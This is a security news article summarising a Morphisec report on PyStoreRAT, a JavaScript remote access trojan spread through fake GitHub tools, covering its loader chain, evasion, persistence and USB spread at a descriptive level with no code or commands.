A new report out today from endpoint security firm Morphisec Inc. details a previously undocumented malware family dubbed “PyStoreRAT” that abuses trusted open-source platforms and Windows scripting features to establish remote access on infected systems.

A JavaScript-based remote access trojan, PyStoreRAT is delivered through lightweight Python and JavaScript loader stubs hidden inside GitHub-hosted repositories that appear to be legitimate developer tools or open-source intelligence utilities.

PyStoreRAT uses malicious repositories that are often visually convincing, including polished README files, artificial intelligence-generated graphics and simulated functions to lure victims into running a few lines of loader code. Once executed, the loader downloads a remote HTML application file and launches it using the native Windows mshta.exe utility to ensure that the core malware never exists as a traditional executable on disk during the initial stages of infection.

Once up and running, PyStoreRAT profiles the infected system, including collecting host identity information, operating system telemetry, installed security tools and privilege levels before registering with a command-and-control server.

Interestingly, the malware doesn’t want to be found and uses a session-based handshake that returns a unique authentication token that can be difficult to detect.

Morphisec’s research found that PyStoreRAT includes targeted evasion logic designed to detect CrowdStrike Falcon and other security processes by altering its execution path if it believes it is under observation. The malware also establishes persistence by creating a scheduled task disguised as an “NVIDIA App SelfUpdate” process that can execute every 10 minutes or at user login, making it resilient against basic system restarts.

Under the hood, the command framework of PyStoreRAT is highly modular and supports downloading and executing payloads across multiple formats, including executables, DLLs, MSI installers, PowerShell scripts, Python archives and additional HTA files.

PyStoreRAT can also be spread through USB-based lateral movement. The malware can replace legitimate files on removable drives with malicious shortcut files that first execute the malware before opening the expected document.

“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” explains Morphisec researcher and report author Yonatan Edri. “Its use of HTA/JS for execution, Python loaders for delivery and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional endpoint detection and response solutions detect only late in the infection chain.”

Image: Morphisec